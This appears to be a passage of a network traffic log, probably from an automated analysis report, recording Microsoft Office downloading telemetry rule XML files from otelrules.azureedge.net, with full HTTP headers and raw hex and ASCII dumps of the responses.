                                                                                                                                                                      2024-11-21 05:24:09 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      125192.168.2.64989113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:09 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:09 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1354
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                      x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052409Z-r1d97b99577d6qrbhC1TEBux5s00000009yg00000000kcbz
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:09 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      126192.168.2.64989213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:09 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:09 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                      x-ms-request-id: e7f96b90-101e-008e-3275-3bcf88000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052409Z-r1d97b99577xdmfxhC1TEBqbhg00000001n0000000003ceu
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      127192.168.2.64989313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:09 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:09 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                      x-ms-request-id: 57f4d0d3-201e-0033-0b7c-3bb167000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052409Z-1777c6cb754wcxkwhC1TEB3c6w0000000ag000000000pt5c
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      128192.168.2.64989413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:09 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:09 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                      x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052409Z-178bfbc474bbcwv4hC1NYCypys00000000tg00000000r8ww
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:09 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      129192.168.2.64989813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:11 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:11 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                      x-ms-request-id: e32f1f1e-f01e-003f-51ae-3bd19d000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052411Z-r1d97b99577lxltfhC1TEByw2s00000009ug00000000q046
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      130192.168.2.64989713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:11 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:11 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                                                      x-ms-request-id: 538caadb-101e-0028-028c-3a8f64000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052411Z-1777c6cb754gc8g6hC1TEB966c0000000akg00000000h2x6
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:11 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      131192.168.2.64989913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:11 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:11 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                                                      x-ms-request-id: 7bd1ae59-401e-008c-598c-3a86c2000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052411Z-178bfbc474bxkclvhC1NYC69g4000000012g00000000007r
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      132192.168.2.64990013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:11 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:11 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                      x-ms-request-id: 84d260c2-101e-0017-627f-3b47c7000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052411Z-1777c6cb754dqb2khC1TEBmk1s0000000ar0000000000rxs
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:11 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      133192.168.2.64990113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:11 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:11 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                                                      x-ms-request-id: 4a98b9d9-501e-008c-636d-3bcd39000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052411Z-178bfbc474bfw4gbhC1NYCunf400000000wg0000000114gv
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:12 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      134192.168.2.64990240.113.110.67443
                                                                                                                                                                      TimestampBytes transferredDirectionData
